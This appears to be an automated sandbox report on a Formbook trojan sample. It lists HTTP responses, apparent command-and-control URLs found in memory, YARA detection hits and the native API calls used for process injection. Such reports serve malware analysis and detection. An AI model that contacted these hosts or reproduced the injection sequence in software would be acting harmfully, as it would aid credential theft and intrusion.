            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 08 May 2024 12:07:38 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeVary: Accept-Encoding
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundCache-Control: privateContent-Type: text/html; charset=utf-8Server: Microsoft-IIS/8.5X-Powered-By: ASP.NETDate: Wed, 08 May 2024 12:08:14 GMTConnection: closeContent-Length: 4947
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundCache-Control: privateContent-Type: text/html; charset=utf-8Server: Microsoft-IIS/8.5X-Powered-By: ASP.NETDate: Wed, 08 May 2024 12:08:17 GMTConnection: closeContent-Length: 4947
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundCache-Control: privateContent-Type: text/html; charset=utf-8Server: Microsoft-IIS/8.5X-Powered-By: ASP.NETDate: Wed, 08 May 2024 12:08:20 GMTConnection: closeContent-Length: 4947
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundCache-Control: privateContent-Type: text/html; charset=utf-8Server: Microsoft-IIS/8.5X-Powered-By: ASP.NETDate: Wed, 08 May 2024 12:08:23 GMTConnection: closeContent-Length: 5097
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 08 May 2024 12:08:38 GMTContent-Type: text/htmlContent-Length: 548Connection: close
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx Date: Wed, 08 May 2024 12:08:41 GMT Content-Type: text/html Content-Length: 548 Connection: close Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx Date: Wed, 08 May 2024 12:08:44 GMT Content-Type: text/html Content-Length: 548 Connection: close Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx Date: Wed, 08 May 2024 12:08:46 GMT Content-Type: text/html Content-Length: 548 Connection: close Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
            Source: sfc.exe, 0000000C.00000002.4093679938.0000000003D16000.00000004.10000000.00040000.00000000.sdmp, tyVvDSdgzXcAfzWUYqtqOHNMkF.exe, 00000010.00000002.4093054650.00000000038A6000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: http://auetravel.kz/wu8v/?MdtlcTm=o0dJzo0
            Source: sfc.exe, 0000000C.00000002.4093679938.0000000004682000.00000004.10000000.00040000.00000000.sdmp, tyVvDSdgzXcAfzWUYqtqOHNMkF.exe, 00000010.00000002.4093054650.0000000004212000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: http://getgoodscrub.com/wu8v/?MdtlcTm=G9rRy2qYQIDZeyI4LJY6JNX1SXnAoDrMeesi9cL1NNtjWs0X9VQENpz2e8f5yO
            Source: sfc.exe, 0000000C.00000002.4093679938.00000000049A6000.00000004.10000000.00040000.00000000.sdmp, sfc.exe, 0000000C.00000002.4095229118.0000000006160000.00000004.00000800.00020000.00000000.sdmp, tyVvDSdgzXcAfzWUYqtqOHNMkF.exe, 00000010.00000002.4093054650.0000000004536000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: http://parked.reg.bookmyname.com/images/lien_1.gif
            Source: sfc.exe, 0000000C.00000002.4093679938.00000000049A6000.00000004.10000000.00040000.00000000.sdmp, sfc.exe, 0000000C.00000002.4095229118.0000000006160000.00000004.00000800.00020000.00000000.sdmp, tyVvDSdgzXcAfzWUYqtqOHNMkF.exe, 00000010.00000002.4093054650.0000000004536000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: http://parked.reg.bookmyname.com/images/lien_2.gif
            Source: sfc.exe, 0000000C.00000002.4093679938.00000000049A6000.00000004.10000000.00040000.00000000.sdmp, sfc.exe, 0000000C.00000002.4095229118.0000000006160000.00000004.00000800.00020000.00000000.sdmp, tyVvDSdgzXcAfzWUYqtqOHNMkF.exe, 00000010.00000002.4093054650.0000000004536000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: http://parked.reg.bookmyname.com/images/lien_3.gif
            Source: sfc.exe, 0000000C.00000002.4093679938.00000000049A6000.00000004.10000000.00040000.00000000.sdmp, sfc.exe, 0000000C.00000002.4095229118.0000000006160000.00000004.00000800.00020000.00000000.sdmp, tyVvDSdgzXcAfzWUYqtqOHNMkF.exe, 00000010.00000002.4093054650.0000000004536000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: http://parked.reg.bookmyname.com/images/lien_4.gif
            Source: sfc.exe, 0000000C.00000002.4093679938.00000000049A6000.00000004.10000000.00040000.00000000.sdmp, sfc.exe, 0000000C.00000002.4095229118.0000000006160000.00000004.00000800.00020000.00000000.sdmp, tyVvDSdgzXcAfzWUYqtqOHNMkF.exe, 00000010.00000002.4093054650.0000000004536000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: http://parked.reg.bookmyname.com/images/lien_5.gif
            Source: sfc.exe, 0000000C.00000002.4093679938.00000000049A6000.00000004.10000000.00040000.00000000.sdmp, sfc.exe, 0000000C.00000002.4095229118.0000000006160000.00000004.00000800.00020000.00000000.sdmp, tyVvDSdgzXcAfzWUYqtqOHNMkF.exe, 00000010.00000002.4093054650.0000000004536000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: http://parked.reg.bookmyname.com/images/lien_6.gif
            Source: sfc.exe, 0000000C.00000002.4093679938.00000000049A6000.00000004.10000000.00040000.00000000.sdmp, sfc.exe, 0000000C.00000002.4095229118.0000000006160000.00000004.00000800.00020000.00000000.sdmp, tyVvDSdgzXcAfzWUYqtqOHNMkF.exe, 00000010.00000002.4093054650.0000000004536000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: http://parked.reg.bookmyname.com/images/lien_7.gif
            Source: sfc.exe, 0000000C.00000002.4093679938.00000000049A6000.00000004.10000000.00040000.00000000.sdmp, sfc.exe, 0000000C.00000002.4095229118.0000000006160000.00000004.00000800.00020000.00000000.sdmp, tyVvDSdgzXcAfzWUYqtqOHNMkF.exe, 00000010.00000002.4093054650.0000000004536000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: http://parked.reg.bookmyname.com/images/lien_8.gif
            Source: NdYuOgHbM9.exe, 00000000.00000002.1804365853.000001EF3A961000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: Amcache.hve.9.dr String found in binary or memory: http://upx.sf.net
            Source: sfc.exe, 0000000C.00000002.4093679938.00000000049A6000.00000004.10000000.00040000.00000000.sdmp, sfc.exe, 0000000C.00000002.4095229118.0000000006160000.00000004.00000800.00020000.00000000.sdmp, tyVvDSdgzXcAfzWUYqtqOHNMkF.exe, 00000010.00000002.4093054650.0000000004536000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: http://www.afilias.info/
            Source: tyVvDSdgzXcAfzWUYqtqOHNMkF.exe, 00000010.00000002.4093054650.0000000004536000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: http://www.bookmyname.com/
            Source: sfc.exe, 0000000C.00000002.4093679938.00000000049A6000.00000004.10000000.00040000.00000000.sdmp, sfc.exe, 0000000C.00000002.4095229118.0000000006160000.00000004.00000800.00020000.00000000.sdmp, tyVvDSdgzXcAfzWUYqtqOHNMkF.exe, 00000010.00000002.4093054650.0000000004536000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: http://www.eurid.eu/
            Source: sfc.exe, 0000000C.00000002.4093679938.00000000049A6000.00000004.10000000.00040000.00000000.sdmp, sfc.exe, 0000000C.00000002.4095229118.0000000006160000.00000004.00000800.00020000.00000000.sdmp, tyVvDSdgzXcAfzWUYqtqOHNMkF.exe, 00000010.00000002.4093054650.0000000004536000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: http://www.icann.org/
            Source: sfc.exe, 0000000C.00000002.4093679938.0000000004CCA000.00000004.10000000.00040000.00000000.sdmp, tyVvDSdgzXcAfzWUYqtqOHNMkF.exe, 00000010.00000002.4093054650.000000000485A000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: http://www.insertcoen.com:80/wu8v/?MdtlcTm=jVsDngfN17jo53xCVVHLBYy1RtgDvNhrjbHy79NIDh3y3n8I8UoARbyDj
            Source: tyVvDSdgzXcAfzWUYqtqOHNMkF.exe, 00000010.00000002.4094582069.000000000580B000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: http://www.lm2ue.us
            Source: tyVvDSdgzXcAfzWUYqtqOHNMkF.exe, 00000010.00000002.4094582069.000000000580B000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: http://www.lm2ue.us/wu8v/
            Source: sfc.exe, 0000000C.00000002.4093679938.0000000004814000.00000004.10000000.00040000.00000000.sdmp, tyVvDSdgzXcAfzWUYqtqOHNMkF.exe, 00000010.00000002.4093054650.00000000043A4000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: http://www.marksmile.com/asset/lp_qrcode.png
            Source: sfc.exe, 0000000C.00000002.4093679938.0000000004814000.00000004.10000000.00040000.00000000.sdmp, tyVvDSdgzXcAfzWUYqtqOHNMkF.exe, 00000010.00000002.4093054650.00000000043A4000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: http://www.marksmile.com/asset/lp_style.css
            Source: sfc.exe, 0000000C.00000002.4093679938.00000000049A6000.00000004.10000000.00040000.00000000.sdmp, sfc.exe, 0000000C.00000002.4095229118.0000000006160000.00000004.00000800.00020000.00000000.sdmp, tyVvDSdgzXcAfzWUYqtqOHNMkF.exe, 00000010.00000002.4093054650.0000000004536000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: http://www.neulevel.biz/
            Source: sfc.exe, 0000000C.00000002.4093679938.00000000049A6000.00000004.10000000.00040000.00000000.sdmp, sfc.exe, 0000000C.00000002.4095229118.0000000006160000.00000004.00000800.00020000.00000000.sdmp, tyVvDSdgzXcAfzWUYqtqOHNMkF.exe, 00000010.00000002.4093054650.0000000004536000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: http://www.pir.org/
            Source: sfc.exe, 0000000C.00000002.4095332097.0000000007C24000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
            Source: sfc.exe, 0000000C.00000002.4095332097.0000000007C24000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
            Source: sfc.exe, 0000000C.00000002.4095332097.0000000007C24000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
            Source: sfc.exe, 0000000C.00000002.4095332097.0000000007C24000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
            Source: sfc.exe, 0000000C.00000002.4095332097.0000000007C24000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/ac/?q=
            Source: sfc.exe, 0000000C.00000002.4095332097.0000000007C24000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/chrome_newtab
            Source: sfc.exe, 0000000C.00000002.4095332097.0000000007C24000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
            Source: sfc.exe, 0000000C.00000002.4093679938.00000000041CC000.00000004.10000000.00040000.00000000.sdmp, sfc.exe, 0000000C.00000002.4095229118.0000000006160000.00000004.00000800.00020000.00000000.sdmp, tyVvDSdgzXcAfzWUYqtqOHNMkF.exe, 00000010.00000002.4093054650.0000000003D5C000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://img.sedoparking.com/templates/images/hero_nc.svg
            Source: sfc.exe, 0000000C.00000002.4093679938.0000000004814000.00000004.10000000.00040000.00000000.sdmp, tyVvDSdgzXcAfzWUYqtqOHNMkF.exe, 00000010.00000002.4093054650.00000000043A4000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://lf6-cdn-tos.bytecdntp.com/cdn/expire-1-M/axios/0.26.0/axios.min.js
            Source: sfc.exe, 0000000C.00000002.4091957268.0000000002D34000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
            Source: sfc.exe, 0000000C.00000002.4091957268.0000000002D34000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
            Source: sfc.exe, 0000000C.00000002.4091957268.0000000002D34000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
            Source: sfc.exe, 0000000C.00000002.4091957268.0000000002D34000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
            Source: sfc.exe, 0000000C.00000002.4091957268.0000000002D34000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
            Source: sfc.exe, 0000000C.00000002.4091957268.0000000002D17000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
            Source: sfc.exe, 0000000C.00000003.2023276943.0000000007BF9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
            Source: sfc.exe, 0000000C.00000002.4093679938.0000000004814000.00000004.10000000.00040000.00000000.sdmp, tyVvDSdgzXcAfzWUYqtqOHNMkF.exe, 00000010.00000002.4093054650.00000000043A4000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://mail.365.com/login.html
            Source: sfc.exe, 0000000C.00000002.4095229118.0000000006160000.00000004.00000800.00020000.00000000.sdmp, tyVvDSdgzXcAfzWUYqtqOHNMkF.exe, 00000010.00000002.4093054650.0000000004536000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://parked.reg.bookmyname.com/images/all_off.gif
            Source: sfc.exe, 0000000C.00000002.4095229118.0000000006160000.00000004.00000800.00020000.00000000.sdmp, tyVvDSdgzXcAfzWUYqtqOHNMkF.exe, 00000010.00000002.4093054650.0000000004536000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://parked.reg.bookmyname.com/images/es_off.gif
            Source: sfc.exe, 0000000C.00000002.4093679938.00000000049A6000.00000004.10000000.00040000.00000000.sdmp, tyVvDSdgzXcAfzWUYqtqOHNMkF.exe, 00000010.00000002.4093054650.0000000004536000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://parked.reg.bookmyname.com/images/fr_banniere_haut.jpg
            Source: sfc.exe, 0000000C.00000002.4095229118.0000000006160000.00000004.00000800.00020000.00000000.sdmp, tyVvDSdgzXcAfzWUYqtqOHNMkF.exe, 00000010.00000002.4093054650.0000000004536000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://parked.reg.bookmyname.com/images/fr_on.gif
            Source: sfc.exe, 0000000C.00000002.4093679938.00000000049A6000.00000004.10000000.00040000.00000000.sdmp, tyVvDSdgzXcAfzWUYqtqOHNMkF.exe, 00000010.00000002.4093054650.0000000004536000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://parked.reg.bookmyname.com/images/gb_off.gif
            Source: sfc.exe, 0000000C.00000002.4093679938.00000000049A6000.00000004.10000000.00040000.00000000.sdmp, tyVvDSdgzXcAfzWUYqtqOHNMkF.exe, 00000010.00000002.4093054650.0000000004536000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://parked.reg.bookmyname.com/images/logo_book.gif
            Source: sfc.exe, 0000000C.00000002.4093679938.00000000049A6000.00000004.10000000.00040000.00000000.sdmp, tyVvDSdgzXcAfzWUYqtqOHNMkF.exe, 00000010.00000002.4093054650.0000000004536000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://parked.reg.bookmyname.com/styles/styles-redir.css
            Source: sfc.exe, 0000000C.00000002.4093679938.00000000049A6000.00000004.10000000.00040000.00000000.sdmp, tyVvDSdgzXcAfzWUYqtqOHNMkF.exe, 00000010.00000002.4093054650.0000000004536000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://www.bookmyname.com
            Source: tyVvDSdgzXcAfzWUYqtqOHNMkF.exe, 00000010.00000002.4093054650.0000000004536000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://www.bookmyname.com/
            Source: sfc.exe, 0000000C.00000002.4093679938.00000000049A6000.00000004.10000000.00040000.00000000.sdmp, tyVvDSdgzXcAfzWUYqtqOHNMkF.exe, 00000010.00000002.4093054650.0000000004536000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://www.bookmyname.com/?wl=de
            Source: sfc.exe, 0000000C.00000002.4093679938.00000000049A6000.00000004.10000000.00040000.00000000.sdmp, tyVvDSdgzXcAfzWUYqtqOHNMkF.exe, 00000010.00000002.4093054650.0000000004536000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://www.bookmyname.com/?wl=en
            Source: sfc.exe, 0000000C.00000002.4095229118.0000000006160000.00000004.00000800.00020000.00000000.sdmp, tyVvDSdgzXcAfzWUYqtqOHNMkF.exe, 00000010.00000002.4093054650.0000000004536000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://www.bookmyname.com/?wl=es
            Source: sfc.exe, 0000000C.00000002.4095229118.0000000006160000.00000004.00000800.00020000.00000000.sdmp, tyVvDSdgzXcAfzWUYqtqOHNMkF.exe, 00000010.00000002.4093054650.0000000004536000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://www.bookmyname.com/?wl=fr
            Source: sfc.exe, 0000000C.00000002.4093679938.00000000049A6000.00000004.10000000.00040000.00000000.sdmp, tyVvDSdgzXcAfzWUYqtqOHNMkF.exe, 00000010.00000002.4093054650.0000000004536000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://www.bookmyname.com/nom_de_domaine/tarif_nom_de_domaine.html
            Source: sfc.exe, 0000000C.00000002.4093679938.00000000049A6000.00000004.10000000.00040000.00000000.sdmp, sfc.exe, 0000000C.00000002.4095229118.0000000006160000.00000004.00000800.00020000.00000000.sdmp, tyVvDSdgzXcAfzWUYqtqOHNMkF.exe, 00000010.00000002.4093054650.0000000004536000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://www.bookmyname.com/whois_informations_nom_de_domaine.html?wl=en
            Source: sfc.exe, 0000000C.00000002.4093679938.00000000049A6000.00000004.10000000.00040000.00000000.sdmp, sfc.exe, 0000000C.00000002.4095229118.0000000006160000.00000004.00000800.00020000.00000000.sdmp, tyVvDSdgzXcAfzWUYqtqOHNMkF.exe, 00000010.00000002.4093054650.0000000004536000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://www.bookmyname.com/whois_informations_nom_de_domaine.html?wl=fr
            Source: sfc.exe, 0000000C.00000002.4093679938.00000000049A6000.00000004.10000000.00040000.00000000.sdmp, sfc.exe, 0000000C.00000002.4095229118.0000000006160000.00000004.00000800.00020000.00000000.sdmp, tyVvDSdgzXcAfzWUYqtqOHNMkF.exe, 00000010.00000002.4093054650.0000000004536000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://www.bookmyname.com/whoisctc.cgi?wl=en
            Source: sfc.exe, 0000000C.00000002.4093679938.00000000049A6000.00000004.10000000.00040000.00000000.sdmp, sfc.exe, 0000000C.00000002.4095229118.0000000006160000.00000004.00000800.00020000.00000000.sdmp, tyVvDSdgzXcAfzWUYqtqOHNMkF.exe, 00000010.00000002.4093054650.0000000004536000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://www.bookmyname.com/whoisctc.cgi?wl=fr
            Source: sfc.exe, 0000000C.00000002.4095332097.0000000007C24000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.ecosia.org/newtab/
            Source: sfc.exe, 0000000C.00000002.4093679938.0000000004814000.00000004.10000000.00040000.00000000.sdmp, tyVvDSdgzXcAfzWUYqtqOHNMkF.exe, 00000010.00000002.4093054650.00000000043A4000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://www.marksmile.com/
            Source: sfc.exe, 0000000C.00000002.4093679938.00000000041CC000.00000004.10000000.00040000.00000000.sdmp, sfc.exe, 0000000C.00000002.4095229118.0000000006160000.00000004.00000800.00020000.00000000.sdmp, tyVvDSdgzXcAfzWUYqtqOHNMkF.exe, 00000010.00000002.4093054650.0000000003D5C000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://www.namecheap.com/domains/registration/results/?domain=luckydomainz.shop
            Source: sfc.exe, 0000000C.00000002.4095229118.0000000006160000.00000004.00000800.00020000.00000000.sdmp, tyVvDSdgzXcAfzWUYqtqOHNMkF.exe, 00000010.00000002.4093054650.0000000003D5C000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://www.sedo.com/services/parking.php3

            E-Banking Fraud

            Source: Yara match File source: 5.2.ngen.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match File source: 5.2.ngen.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match File source: 0000000C.00000002.4092649802.0000000002F30000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 0000000C.00000002.4091718758.0000000002A80000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000005.00000002.1847525772.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 0000000C.00000002.4092708936.0000000002F70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000005.00000002.1847829194.0000000005250000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000010.00000002.4094582069.0000000005760000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000005.00000002.1849163774.0000000005B50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 0000000B.00000002.4092694801.00000000027B0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

            System Summary

            Source: 5.2.ngen.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 5.2.ngen.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 0000000C.00000002.4092649802.0000000002F30000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 0000000C.00000002.4091718758.0000000002A80000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000005.00000002.1847525772.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 0000000C.00000002.4092708936.0000000002F70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000005.00000002.1847829194.0000000005250000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000010.00000002.4094582069.0000000005760000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000005.00000002.1849163774.0000000005B50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 0000000B.00000002.4092694801.00000000027B0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 5_2_0042AE83 NtClose,5_2_0042AE83
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 5_2_057735C0 NtCreateMutant,LdrInitializeThunk,5_2_057735C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 5_2_05772DF0 NtQuerySystemInformation,LdrInitializeThunk,5_2_05772DF0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 5_2_05772C70 NtFreeVirtualMemory,LdrInitializeThunk,5_2_05772C70
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 5_2_05772B60 NtClose,LdrInitializeThunk,5_2_05772B60
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 5_2_05774650 NtSuspendThread,5_2_05774650
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 5_2_05773010 NtOpenDirectoryObject,5_2_05773010
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 5_2_05773090 NtSetValueKey,5_2_05773090
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 5_2_05774340 NtSetContextThread,5_2_05774340
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 5_2_05773D70 NtOpenThread,5_2_05773D70
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 5_2_05772D30 NtUnmapViewOfSection,5_2_05772D30
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 5_2_05772D10 NtMapViewOfSection,5_2_05772D10
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 5_2_05773D10 NtOpenProcessToken,5_2_05773D10
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 5_2_05772D00 NtSetInformationFile,5_2_05772D00
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 5_2_05772DD0 NtDelayExecution,5_2_05772DD0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 5_2_05772DB0 NtEnumerateKey,5_2_05772DB0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 5_2_05772C60 NtCreateKey,5_2_05772C60
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 5_2_05772C00 NtQueryInformationProcess,5_2_05772C00
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 5_2_05772CF0 NtOpenProcess,5_2_05772CF0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 5_2_05772CC0 NtQueryVirtualMemory,5_2_05772CC0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 5_2_05772CA0 NtQueryInformationToken,5_2_05772CA0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 5_2_05772F60 NtCreateProcessEx,5_2_05772F60
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 5_2_05772F30 NtCreateSection,5_2_05772F30
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 5_2_05772FE0 NtCreateFile,5_2_05772FE0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 5_2_05772FB0 NtResumeThread,5_2_05772FB0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 5_2_05772FA0 NtQuerySection,5_2_05772FA0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 5_2_05772F90 NtProtectVirtualMemory,5_2_05772F90
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 5_2_05772E30 NtWriteVirtualMemory,5_2_05772E30
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 5_2_05772EE0 NtQueueApcThread,5_2_05772EE0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 5_2_05772EA0 NtAdjustPrivilegesToken,5_2_05772EA0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 5_2_05772E80 NtReadVirtualMemory,5_2_05772E80
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_057739B0 NtGetContextThread,5_2_057739B0
